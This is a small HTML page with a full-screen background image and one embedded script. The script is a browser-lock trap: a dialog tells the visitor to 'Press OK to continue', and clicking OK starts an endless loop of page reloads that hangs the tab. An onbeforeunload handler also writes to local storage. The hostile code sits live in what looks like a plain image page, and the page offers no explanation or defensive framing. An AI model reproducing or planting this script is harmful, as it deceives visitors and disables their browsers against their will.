<!DOCTYPE html>
<html> 
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
  height: 100%;
  margin: 0;
}

.bg {
  /* The image used */
  background-image: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ77QmY8o-p2DDYg7ZXn5oY3tswFYpqH5HcWQ&usqp=CAU");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

h1 {text-align: center;}
p {text-align: center;}
.center {
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 50%;
}
</style>
<body> 

<p id="demo"></p> 
<script> onbeforeunload = function(){localStorage.x=1}; if(confirm("Press OK to continue.")){ setTimeout(function(){ while(1)location.reload(1) }, 1000) } </script>
</body> 
</html>
